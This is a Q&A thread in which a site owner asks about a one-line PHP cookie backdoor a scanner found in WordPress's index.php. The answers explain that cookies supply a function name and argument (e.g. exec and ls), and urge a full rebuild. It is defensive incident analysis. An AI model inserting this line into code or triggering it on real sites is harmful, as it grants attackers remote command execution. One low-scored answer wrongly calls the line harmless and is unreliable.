# Wordpress unfamiliar code in root files

Tags: php, wordpress, security, cookies

Recently one of the WP website files where deleted "CXS scanner " and detected all the files in root folder as

`index.php'
Known exploit = [Fingerprint Match] [PHP COOKIE Exploit [P1036]]`

When I compared file detected as cookie exploit with the older version, I noticed that there was extra line of code added to the this file:

Detected `index.php`

```
<?php

if (isset($_COOKIE["id"])) @$_COOKIE["user"]($_COOKIE["id"]);


/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define('WP_USE_THEMES', true);

/** Loads the WordPress Environment and Template */
require( dirname( __FILE__ ) . '/wp-blog-header.php' );
```

**Older `index.php`**

```
<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define('WP_USE_THEMES', true);

/** Loads the WordPress Environment and Template */
require( dirname( __FILE__ ) . '/wp-blog-header.php' );
```

I am not a PHP developer and on comparing this line of code added to the flagged file:

```
if (isset($_COOKIE["id"])) @$_COOKIE["user"]($_COOKIE["id"]);
```

should it be there or is it a security flaw?

Answer (score 3, accepted):

It is a backdoor/exploit.

In PHP you can call functions with a variable name by calling: $var(). The same is happening here.

```
<?php
function echoit($string)
{
    echo $string;
}

$func = 'echoit';
$func('test');  // Dies ruft echoit() auf
?>
```

(Source: http://php.net/manual/de/functions.variable-functions.php)

To trigger this exploit you have to send two cookies. One cookie named: user, with the function as your value and the other one name "id" with the parameter you want to call it with.

So user="exec", id="ls" will call the exec function with the parameter "ls".

It is a rather nice one...you should remove this line from all your files.

**In Addition:** you have to find out why it ended in there the first place. There can be other backdoors on this system as well. You should consider this server to be compromised. Hacked systems should be burned down. Then they can rise from the ashes as a beautiful phoenix again (or so). **Nevertheless, You should rebuild your system with up-to-date software and data from a backup which is clean and change all passwords.**

Comment: Thanks, I have removed this line of code from all files.. I will leave this question open for some more time to have other opinion. You answer is what i was looking for.

Comment: Just removing it is no use if you haven't fixed the problem that allowed the attacker to put it there. It—or other exploits—will just come back. You should consider this account/server compromised and build a new, clean one with up-to-date software and different passwords for all accounts.

Comment: @bobince thanks..added note about rebuilding and burning down system :)

Comment: We had already done that and cleaned/ removed the infected plugin... this code was not detected by antivirus rather by `Arrow CXS scanner `.. i have removed the code from all files and even web server was changed. it seems hosting provider server was compromised ... ..

Comment: Perfect. It was just an addition, so if anybody stumbles upon this, it's clear what should be done at least.

Answer (score 0):

The `@` sign is only used to suppress errors and as far as I can see, that extra line is not a vulnerability.

Comment: Not sure then why it was flagged and deleted by `CXS scanner  ` from the server `public_html/index.php'
Known exploit = [Fingerprint Match] [PHP COOKIE Exploit [P1036]]`

Comment: Sorry, was not looking carefully, I'm thinking that it can be used to remotely call a function in the file... Perhaps my PHP juju is not strong enough to figure this out.

Comment: Thanks, Will wait for some expert guru's to comment on this. I am not event from PHP i just know bit of php programing ...